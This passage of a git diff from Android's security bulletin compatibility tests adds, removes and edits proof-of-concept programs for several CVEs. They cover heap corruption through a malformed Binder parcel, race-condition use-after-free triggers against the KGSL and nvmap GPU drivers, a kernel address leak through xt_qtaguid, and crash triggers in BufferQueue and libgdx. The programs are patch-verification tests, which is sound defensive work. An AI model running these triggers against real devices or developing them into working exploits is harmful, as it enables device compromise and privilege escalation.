+ pData->writeString16(String16(class_name));
+}
+
+void writeRegion(Parcel *pData) {
+ pData->writeInt32(100); // length of region;
+ pData->writeInt32(
+ 0x3fffffff); // runCount, the allocted size will be 0x3fffffff*4+16=0xc
+ pData->writeInt32(0xf); // fBounds
+ pData->writeInt32(0xf); // YSpanCount
+ pData->writeInt32(0xf); // IntervalCount
+
+ char buffer[100];
+ memset(buffer, 0xcc,
+ sizeof(buffer)); // this buffer will be used to corrrupt the heap
+ pData->write(buffer, sizeof(buffer));
+}
+
+static void writeBundle(Parcel *pData, int type) {
+ size_t lengthPos = pData->dataPosition();
+ pData->writeInt32(0xfffff);
+ const int BUNDLE_MAGIC = 0x4C444E42;
+ pData->writeInt32(BUNDLE_MAGIC);
+ size_t startPos = pData->dataPosition();
+
+ if (type == HEAPCORRUPT) {
+ pData->writeInt32(1); // from writeArrayMapInternal,object numbers in bundle
+ writeParcelableHead(pData, "android.graphics.Region");
+ writeRegion(pData);
+ } else { // other than HEAPCORRUPT
+ exit(0);
+ }
+
+ size_t endPos = pData->dataPosition();
+ // Backpatch length
+ pData->setDataPosition(lengthPos);
+ int length = endPos - startPos;
+ pData->writeInt32(length);
+ pData->setDataPosition(endPos);
+}
+
+static void transact(sp<IBinder> &service, TRANTYPE type) {
+ const int CONVERT_TO_TRANSLUCENT_TRANSACTION = 175;
+ Parcel data, reply;
+
+ data.writeInterfaceToken(String16("android.app.IActivityManager"));
+ data.writeStrongBinder(service);
+ data.writeInt32(333);
+ writeBundle(&data, type);
+ service->transact(CONVERT_TO_TRANSLUCENT_TRANSACTION, data, &reply);
+}
+
+int main(__attribute__((unused)) int argc,
+ __attribute__((unused)) char *const argv[]) {
+ sp<IServiceManager> sm = defaultServiceManager();
+ sp<IBinder> service = sm->checkService(String16("activity"));
+ if (service != NULL) {
+ printf("heap corruption\n");
+ transact(service, HEAPCORRUPT);
+ } else {
+ printf("get activitymanger failed\n");
+ }
+ return 0;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-2504/Android.mk b/hostsidetests/securitybulletin/securityPatch/CVE-2016-2504/Android.mk
deleted file mode 100644
index f4c50fe..0000000
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2016-2504/Android.mk
+++ /dev/null
@@ -1,35 +0,0 @@
-# Copyright (C) 2018 The Android Open Source Project
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-
-LOCAL_PATH := $(call my-dir)
-
-include $(CLEAR_VARS)
-LOCAL_MODULE := CVE-2016-2504
-LOCAL_SRC_FILES := poc.c
-LOCAL_MULTILIB := both
-LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
-LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
-
-# Tag this module as a cts test artifact
-LOCAL_COMPATIBILITY_SUITE := cts vts sts
-LOCAL_CTS_TEST_PACKAGE := android.security.cts
-
-
-LOCAL_CFLAGS += -Werror -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
-LOCAL_CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
-LOCAL_CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
-LOCAL_CFLAGS += -Iinclude -fPIE
-LOCAL_LDFLAGS += -fPIE -pie
-LDFLAGS += -rdynamic
-include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-2504/poc.c b/hostsidetests/securitybulletin/securityPatch/CVE-2016-2504/poc.c
deleted file mode 100644
index b272328..0000000
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2016-2504/poc.c
+++ /dev/null
@@ -1,160 +0,0 @@
-/**
-* Copyright (C) 2018 The Android Open Source Project
-*
-* Licensed under the Apache License, Version 2.0 (the "License");
-* you may not use this file except in compliance with the License.
-* You may obtain a copy of the License at
-*
-* http://www.apache.org/licenses/LICENSE-2.0
-*
-* Unless required by applicable law or agreed to in writing, software
-* distributed under the License is distributed on an "AS IS" BASIS,
-* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-* See the License for the specific language governing permissions and
-* limitations under the License.
-*/
-
-#define _GNU_SOURCE
-#include <errno.h>
-#include <fcntl.h>
-#include <pthread.h>
-#include <signal.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include <sys/ioctl.h>
-#include <sys/stat.h>
-#include <sys/types.h>
-#include <sys/wait.h>
-#include <unistd.h>
-
-/* ioctls */
-#define KGSL_IOC_TYPE 0x09
-
-enum kgsl_user_mem_type {
- KGSL_USER_MEM_TYPE_PMEM = 0x00000000,
- KGSL_USER_MEM_TYPE_ASHMEM = 0x00000001,
- KGSL_USER_MEM_TYPE_ADDR = 0x00000002,
- KGSL_USER_MEM_TYPE_ION = 0x00000003,
- KGSL_USER_MEM_TYPE_MAX = 0x00000007,
-};
-
-/*
- * Unfortunately, enum kgsl_user_mem_type starts at 0 which does not
- * leave a good value for allocated memory. In the flags we use
- * 0 to indicate allocated memory and thus need to add 1 to the enum
- * values.
- */
-#define KGSL_USERMEM_FLAG(x) (((x) + 1) << KGSL_MEMFLAGS_USERMEM_SHIFT)
-
-#define KGSL_MEMFLAGS_NOT_USERMEM 0
-#define KGSL_MEMFLAGS_USERMEM_PMEM KGSL_USERMEM_FLAG(KGSL_USER_MEM_TYPE_PMEM)
-#define KGSL_MEMFLAGS_USERMEM_ASHMEM \
- KGSL_USERMEM_FLAG(KGSL_USER_MEM_TYPE_ASHMEM)
-#define KGSL_MEMFLAGS_USERMEM_ADDR KGSL_USERMEM_FLAG(KGSL_USER_MEM_TYPE_ADDR)
-#define KGSL_MEMFLAGS_USERMEM_ION KGSL_USERMEM_FLAG(KGSL_USER_MEM_TYPE_ION)
-
-/* add a block of pmem, fb, ashmem or user allocated address
- * into the GPU address space */
-struct kgsl_map_user_mem {
- int fd;
- unsigned long gpuaddr; /*output param */
- size_t len;
- size_t offset;
- unsigned long hostptr; /*input param */
- enum kgsl_user_mem_type memtype;
- unsigned int flags;
-};
-
-#define IOCTL_KGSL_MAP_USER_MEM \
- _IOWR(KGSL_IOC_TYPE, 0x15, struct kgsl_map_user_mem)
-
-/* remove memory from the GPU's address space */
-struct kgsl_sharedmem_free {
- unsigned long gpuaddr;
-};
-
-#define IOCTL_KGSL_SHAREDMEM_FREE \
- _IOW(KGSL_IOC_TYPE, 0x21, struct kgsl_sharedmem_free)
-
-#define KGSL_MEMFLAGS_USERMEM_MASK 0x000000e0
-#define KGSL_MEMFLAGS_USERMEM_SHIFT 5
-
-#define TRUE 1
-
-struct kgsl_map_user_mem allocArg;
-struct kgsl_sharedmem_free freeArg;
-
-int fd;
-int thread_exit = 1;
-
-void *alloc_thread(void*);
-void *free_thread(void*);
-void kgsl_poc(void);
-
-void *alloc_thread() {
- while (thread_exit) {
- allocArg.fd = -1;
- allocArg.gpuaddr = 0x0;
- allocArg.len = 4096;
- allocArg.offset = 0;
- allocArg.hostptr = (unsigned long)malloc(allocArg.len);
- allocArg.memtype = KGSL_USER_MEM_TYPE_ADDR;
- allocArg.flags = KGSL_MEMFLAGS_USERMEM_ADDR;
-
- int ret = ioctl(fd, IOCTL_KGSL_MAP_USER_MEM, &allocArg);
-
- if (ret < 0) {
- printf("Error on IOCTL_KGSL_MAP_USER_MEM - Errno %d (%s)\n", errno,
- strerror(errno));
- return NULL;
- } else if (!allocArg.gpuaddr) {
- allocArg.gpuaddr = allocArg.hostptr;
- }
-
- volatile unsigned long *pGPU = &allocArg.gpuaddr;
-
- while (*pGPU) {
- if (thread_exit)
- break;
- }
-
- free((void *)allocArg.hostptr);
- }
- return NULL;
-}
-
-void *free_thread() {
- volatile unsigned long *pGPU = &allocArg.gpuaddr;
- freeArg.gpuaddr = 0x0;
-
- while (!freeArg.gpuaddr) {
- freeArg.gpuaddr = *pGPU;
- }
-
- while (thread_exit) {
- ioctl(fd, IOCTL_KGSL_SHAREDMEM_FREE, &freeArg);
- *pGPU = 0x0;
- }
- return NULL;
-}
-
-void kgsl_poc() {
- pthread_t allocTid, freeTid;
- fd = open("/dev/kgsl-3d0", 0);
-
- if (fd < 0) {
- printf("Unable to open /dev/kgsl-3d0 - Errno %d (%s)\n", errno,
- strerror(errno));
- exit(-1);
- }
-
- pthread_create(&allocTid, NULL, alloc_thread, NULL);
- pthread_create(&freeTid, NULL, free_thread, NULL);
- pthread_join(allocTid, NULL);
- pthread_join(freeTid, NULL);
-}
-int main() {
- kgsl_poc();
- return 0;
-}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-3809/Android.mk b/hostsidetests/securitybulletin/securityPatch/CVE-2016-3809/Android.mk
deleted file mode 100644
index 615d39b..0000000
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2016-3809/Android.mk
+++ /dev/null
@@ -1,34 +0,0 @@
-# Copyright (C) 2018 The Android Open Source Project
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-
-LOCAL_PATH := $(call my-dir)
-
-include $(CLEAR_VARS)
-LOCAL_MODULE := CVE-2016-3809
-LOCAL_SRC_FILES := poc.c
-LOCAL_MULTILIB := both
-LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
-LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
-
-# Tag this module as a cts test artifact
-LOCAL_COMPATIBILITY_SUITE := cts vts sts
-LOCAL_CTS_TEST_PACKAGE := android.security.cts
-
-LOCAL_SHARED_LIBRARIES := liblog
-
-LOCAL_CFLAGS += -Wall -Werror
-LOCAL_CFLAGS += -Iinclude -fPIE
-LOCAL_LDFLAGS += -fPIE -pie
-LOCAL_LDFLAGS += -rdynamic
-include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-3809/poc.c b/hostsidetests/securitybulletin/securityPatch/CVE-2016-3809/poc.c
deleted file mode 100644
index 4f4805f..0000000
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2016-3809/poc.c
+++ /dev/null
@@ -1,92 +0,0 @@
-/**
- * Copyright (C) 2018 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-#define _GNU_SOURCE
-
-#include <cutils/log.h>
-#include <fcntl.h>
-#include <stdio.h>
-#include <string.h>
-#include <sys/socket.h>
-#include <sys/stat.h>
-#include <sys/types.h>
-#include <unistd.h>
-
-#define BUF_SIZE 2048
-
-int main() {
- int sfd, fd, ret;
- char buf[BUF_SIZE];
- char wbuf[BUF_SIZE];
-
- ret = -1;
- sfd = socket(AF_INET, SOCK_DGRAM, 0);
- if (sfd == -1) {
- perror("socket create");
- return 0;
- }
- snprintf(buf, BUF_SIZE, "/proc/self/net/xt_qtaguid/ctrl");
- fd = open(buf, O_RDWR);
- if (fd == -1) {
- perror("canot open xt_qtaguid ctrl");
- close(sfd);
- return 0;
- }
-
- /* clean all tags */
- snprintf(wbuf, BUF_SIZE - 2, "d %d %u", 0, getuid());
- ret = write(fd, wbuf, strlen(wbuf));
- if (ret < 0) {
- perror("first clean");
- goto err;
- }
-
- unsigned long long tag = ((unsigned long long)0x13371) << 32;
- /* add sock tag */
- snprintf(wbuf, BUF_SIZE - 2, "t %d %llu %u", sfd, tag, getuid());
- ret = write(fd, wbuf, strlen(wbuf));
- if (ret < 0) {
- perror("add sock tag");
- goto err;
- }
-
- ret = read(fd, buf, 22);
- if (ret < 10) {
- perror("canot read or read error");
- goto err;
- }
- buf[21] = '\0';
- char *temp = buf + 5;
- printf("sock addr: 0x%s length=%d \n", temp, (int)strlen(temp));
- short address = (short)*temp;
- printf("addres sis %d", address);
- if (address != 48) // ascii value of 0 is 48
- ALOGE("CVE-2016-3809 test case failed");
- else
- ALOGE("CVE-2016-3809 test case passed");
-
- /* clean all tags again */
- snprintf(wbuf, BUF_SIZE - 2, "d %d %u", 0, getuid());
- ret = write(fd, wbuf, strlen(wbuf));
- if (ret < 0) {
- perror("cannot clean all tags at last time");
- goto err;
- }
-
-err:
- close(sfd);
- close(fd);
- return 0;
-}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-8424/Android.mk b/hostsidetests/securitybulletin/securityPatch/CVE-2016-8424/Android.mk
deleted file mode 100644
index 204ace1..0000000
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2016-8424/Android.mk
+++ /dev/null
@@ -1,32 +0,0 @@
-# Copyright (C) 2016 The Android Open Source Project
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-
-LOCAL_PATH := $(call my-dir)
-
-include $(CLEAR_VARS)
-LOCAL_MODULE := CVE-2016-8424
-LOCAL_SRC_FILES := poc.c
-LOCAL_MULTILIB := both
-LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
-LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
-
-# Tag this module as a cts test artifact
-LOCAL_COMPATIBILITY_SUITE := cts vts general-tests sts
-LOCAL_CTS_TEST_PACKAGE := android.security.cts
-
-LOCAL_ARM_MODE := arm
-LOCAL_CFLAGS := -Wno-unused-parameter -Wall -Werror
-LOCAL_CFLAGS += -Wno-incompatible-pointer-types -Wno-unused-variable
-LOCAL_LDFLAGS += -fPIE -pie
-include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-8424/poc.c b/hostsidetests/securitybulletin/securityPatch/CVE-2016-8424/poc.c
deleted file mode 100644
index 4460b88..0000000
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2016-8424/poc.c
+++ /dev/null
@@ -1,138 +0,0 @@
-/*
- * Copyright (C) 2017 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-#define _GNU_SOURCE
-
-#include <stdlib.h>
-#include <errno.h>
-#include <unistd.h>
-#include <stdio.h>
-#include <dirent.h>
-#include <string.h>
-#include <sys/stat.h>
-#include <sys/ioctl.h>
-#include <stdio.h>
-#include <string.h>
-#include <dlfcn.h>
-#include <sys/time.h>
-#include <sys/mman.h>
-#include <sys/syscall.h>
-#include <sys/resource.h>
-#include <fcntl.h>
-#include <pthread.h>
-#include <unistd.h>
-#include <sched.h>
-
-
-struct nvmap_handle_param {
- __u32 handle; /* nvmap handle */
- __u32 param; /* size/align/base/heap etc. */
- unsigned long result; /* returns requested info*/
-};
-
-struct nvmap_create_handle {
- union {
- __u32 id; /* FromId */
- __u32 size; /* CreateHandle */
- __s32 fd; /* DmaBufFd or FromFd */
- };
- __u32 handle; /* returns nvmap handle */
-};
-
-#define NVMAP_IOC_MAGIC 'N'
-#define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
-#define NVMAP_IOC_PARAM _IOWR(NVMAP_IOC_MAGIC, 8, struct nvmap_handle_param)
-#define NVMAP_IOC_GET_ID _IOWR(NVMAP_IOC_MAGIC, 13, struct nvmap_create_handle)
-#define NVMAP_IOC_GET_FD _IOWR(NVMAP_IOC_MAGIC, 15, struct nvmap_create_handle)
-#define NVMAP_IOC_FREE _IO(NVMAP_IOC_MAGIC, 4)
-
-int g_fd = -1;
-static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
-static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
-struct nvmap_create_handle* g_allocation = NULL;
-
-int open_driver() {
- char* dev_path = "/dev/nvmap";
- g_fd = open(dev_path, O_RDWR);
- if (g_fd < 0) {
- printf("[*] open file(%s) failed, errno=%d\n", dev_path, errno);
- } else {
- printf("[*] open file(%s) succ!\n", dev_path);
- }
- return g_fd;
-}
-
-void trigger_nvmap_create() {
- ioctl(g_fd, NVMAP_IOC_CREATE, g_allocation);
- //printf("[*] NVMAP_IOC_CREATE, fd(%d), last error = %d\n", g_allocation->handle, errno);
-}
-
-void trigger_nvmap_free() {
- static int data = 1024;
- ioctl(g_fd, NVMAP_IOC_FREE, data);
- //printf("[*] NVMAP_IOC_FREE last error = %d\n", errno);
-}
-
-void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
- setpriority(PRIO_PROCESS, gettid(), privi);
- printf("[*] setpriority(%d) errno = %d\n", privi, errno);
-
- /* bind process to a CPU*/
- if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) {
- printf("[*] sched_setaffinity(%ld) errno = %d\n", cpu_mask, errno);
- }
-}
-
-void prepare_data() {
- void* data = calloc(1, 0x1000);
-
- g_allocation = (struct nvmap_create_handle*)data;
- g_allocation->size = 1024;
-
- mprotect(data, 0x1000, PROT_READ);
- printf("[*] mprotect, error = %d\n", errno);
-}
-static int init = 0;
-void* race_thread(void* arg) {
- setup_privi_and_affinity(0, 2);
-
- int i;
- while (1) {
- if (init == 0) {
- pthread_mutex_lock(&mutex);
- pthread_cond_wait(&cond, &mutex);
- pthread_mutex_unlock(&mutex);
- init = 1;
- }
- trigger_nvmap_free();
- }
-}
-
-int main(int argc, char**argv) {
- setup_privi_and_affinity(0, 1);
- if (open_driver() < 0) {
- return -1;
- }
- prepare_data();
- pthread_t tid;
- pthread_create(&tid, NULL, race_thread, NULL);
- sleep(1);
- while (1) {
- if (init == 0)
- pthread_cond_signal(&cond);
- trigger_nvmap_create();
- }
- return 0;
-}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-8479/poc.c b/hostsidetests/securitybulletin/securityPatch/CVE-2016-8479/poc.c
index 94202f6..5d4950a 100644
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2016-8479/poc.c
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2016-8479/poc.c
@@ -26,6 +26,7 @@
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>
+#include "../includes/common.h"
#define THREAD_NUM 600
#define DEV "/dev/kgsl-3d0"
@@ -124,39 +125,46 @@
void* child_ioctl_0(void* no_use) {
int ret = 1;
+ time_t test_started = start_timer();
struct kgsl_drawctxt_destroy kdd = {0};
kdd.drawctxt_id = kgsl_id;
set_affinity(1);
- while (1) {
+ while (timer_active(test_started)) {
ret = ioctl(fd, IOCTL_KGSL_DRAWCTXT_DESTROY, &kdd);
}
+ return NULL;
}
void* child_ioctl_1(void* no_use) {
int ret = 1;
+ time_t test_started = start_timer();
struct kgsl_drawctxt_destroy kdd = {0};
kdd.drawctxt_id = kgsl_id;
set_affinity(2);
- while (1) {
+ while (timer_active(test_started)) {
ret = ioctl(fd, IOCTL_KGSL_DRAWCTXT_DESTROY, &kdd);
}
+ return NULL;
}
void* child_ioctl_2(void* no_use) {
int ret = 1;
+ time_t test_started = start_timer();
struct kgsl_drawctxt_create kdc = {0, 0};
kdc.flags = KGSL_CONTEXT_PREAMBLE | KGSL_CONTEXT_NO_GMEM_ALLOC;
set_affinity(3);
- while (1) {
+ while (timer_active(test_started)) {
ret = ioctl(fd, IOCTL_KGSL_DRAWCTXT_CREATE, &kdc);
kgsl_id = kdc.drawctxt_id;
}
+ return NULL;
}
int main() {
int i, ret;
+ time_t test_started = start_timer();
struct kgsl_drawctxt_create kdc = {0, 0};
kdc.flags = KGSL_CONTEXT_PREAMBLE | KGSL_CONTEXT_NO_GMEM_ALLOC;
struct kgsl_drawctxt_destroy kdd = {0};
@@ -179,8 +187,12 @@
pthread_create(thread_id + i + 2, NULL, child_ioctl_2, NULL);
}
- while (1) {
+ while (timer_active(test_started)) {
ret = ioctl(fd, IOCTL_KGSL_DRAWCTXT_CREATE, &kdc);
kgsl_id = kdc.drawctxt_id;
}
+
+ close(fd);
+
+ return 0;
}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2015-8839/Android.mk b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0415/Android.mk
old mode 100755
new mode 100644
similarity index 73%
rename from hostsidetests/securitybulletin/securityPatch/CVE-2015-8839/Android.mk
rename to hostsidetests/securitybulletin/securityPatch/CVE-2017-0415/Android.mk
index 65fe025..e3884e6
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2015-8839/Android.mk
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0415/Android.mk
@@ -4,7 +4,7 @@
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
-# http://www.apache.org/licenses/LICENSE-2.0
+# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
@@ -15,22 +15,26 @@
LOCAL_PATH := $(call my-dir)
include $(CLEAR_VARS)
-LOCAL_MODULE := CVE-2015-8839
-LOCAL_SRC_FILES := poc.c
-
-LOCAL_SHARED_LIBRARIES := libcutils \
- liblog
+LOCAL_MODULE := CVE-2017-0415
+LOCAL_SRC_FILES := poc.cpp
LOCAL_MULTILIB := both
LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+LOCAL_SHARED_LIBRARIES := libutils \
+ libui \
+ libgui \
+ libmedia
+
+LOCAL_C_INCLUDES:= \
+ $(TOP)/frameworks/native/include/media/openmax
+
# Tag this module as a cts test artifact
LOCAL_COMPATIBILITY_SUITE := cts vts sts
LOCAL_CTS_TEST_PACKAGE := android.security.cts
LOCAL_ARM_MODE := arm
LOCAL_CFLAGS += -Wall -Werror
-LOCAL_LDFLAGS += -fPIE -pie
-LOCAL_LDFLAGS += -rdynamic
+
include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-0415/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0415/poc.cpp
new file mode 100644
index 0000000..37e3ca7
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0415/poc.cpp
@@ -0,0 +1,74 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#include <gui/BufferQueue.h>
+#include <gui/IGraphicBufferProducer.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <ui/Fence.h>
+#include <utils/String8.h>
+
+using namespace android;
+
+#define MAX_TRY 5000 // based on experiments
+volatile int quit = 1;
+
+static void *start2(void *args) {
+ sp<IGraphicBufferProducer> bufferProducer =
+ *(sp<IGraphicBufferProducer> *)args;
+
+ /*
+ * It will end when ever the main thread exits due to
+ * two conditions.
+ * 1. count value reaches less than 0
+ * 2. Transact failed
+ */
+ while (quit) {
+ int buffer;
+ sp<Fence> fence;
+ bufferProducer->dequeueBuffer(&buffer, &fence, 800, 600, 1, 0, nullptr,
+ nullptr);
+ }
+ return NULL;
+}
+
+int main(__attribute__((unused)) int argc,
+ __attribute__((unused)) char *const argv[]) {
+ int count = MAX_TRY;
+ int result = EXIT_SUCCESS;
+ sp<IGraphicBufferProducer> bufferProducer = NULL;
+ sp<IGraphicBufferConsumer> bufferConsumer = NULL;
+
+ pthread_t thread;
+ pthread_create(&thread, NULL, start2, &bufferProducer);
+
+ while (quit) {
+ bufferConsumer->setConsumerName(String8("dddddddddddddddd"));
+ String8 str = bufferProducer->getConsumerName();
+ if (count < 0) {
+ quit = 0;
+ }
+ if (!strcmp("TransactFailed", str.string())) {
+ result = EXIT_FAILURE;
+ quit = 0;
+ }
+ count--;
+ }
+ pthread_join(thread, NULL);
+
+ return result;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-2062/Android.mk b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0477/Android.mk
old mode 100755
new mode 100644
similarity index 75%
copy from hostsidetests/securitybulletin/securityPatch/CVE-2016-2062/Android.mk
copy to hostsidetests/securitybulletin/securityPatch/CVE-2017-0477/Android.mk
index 5e53ee5..5561115
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2016-2062/Android.mk
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0477/Android.mk
@@ -4,30 +4,29 @@
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
-# http://www.apache.org/licenses/LICENSE-2.0
+# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
-# limitations under the License.
+# limitations under the License
+
LOCAL_PATH := $(call my-dir)
include $(CLEAR_VARS)
-LOCAL_MODULE := CVE-2016-2062
+LOCAL_MODULE := CVE-2017-0477
LOCAL_SRC_FILES := poc.c
LOCAL_MULTILIB := both
LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
-LOCAL_SHARED_LIBRARIES := liblog
-
-# Tag this module as a cts test artifact
-LOCAL_COMPATIBILITY_SUITE := cts sts vts
+LOCAL_COMPATIBILITY_SUITE := cts sts
LOCAL_CTS_TEST_PACKAGE := android.security.cts
LOCAL_ARM_MODE := arm
-LOCAL_CFLAGS += -Wall -Werror
+LOCAL_CFLAGS = -Wall -Werror
include $(BUILD_CTS_EXECUTABLE)
+
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-0477/poc.c b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0477/poc.c
new file mode 100644
index 0000000..5a7baa7
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0477/poc.c
@@ -0,0 +1,63 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <dlfcn.h>
+#include <string.h>
+#include <sys/mman.h>
+
+typedef struct {
+ uint32_t width;
+ uint32_t height;
+ uint32_t format;
+ const unsigned char* pixels;
+} gdx2d_pixmap;
+
+gdx2d_pixmap *(*gdx2d_load)(const unsigned char *buffer, uint32_t len);
+void (*gdx2d_free)(const gdx2d_pixmap* pixmap);
+
+int main() {
+ void *libgdx = dlopen("libgdx.so", RTLD_LAZY);
+ if(libgdx == NULL) {
+ return -1;
+ }
+ gdx2d_load = dlsym(libgdx, "gdx2d_load");
+ gdx2d_free = dlsym(libgdx, "gdx2d_free");
+ if(gdx2d_load == NULL || gdx2d_free == NULL){
+ dlclose(libgdx);
+ return -2;
+ }
+
+ char *fname = "/data/local/tmp/CVE-2017-0477.gif";
+ int fd = open(fname, O_RDONLY);
+ struct stat st;
+ fstat(fd, &st);
+ void *ptr = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, fd, 0);
+
+ gdx2d_pixmap *pixmap = gdx2d_load((unsigned char *) ptr, st.st_size);
+ if (pixmap) {
+ gdx2d_free(pixmap);
+ }
+ dlclose(libgdx);
+ return 0;
+}
+
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-2062/Android.mk b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9490/Android.mk
old mode 100755
new mode 100644
similarity index 74%
copy from hostsidetests/securitybulletin/securityPatch/CVE-2016-2062/Android.mk
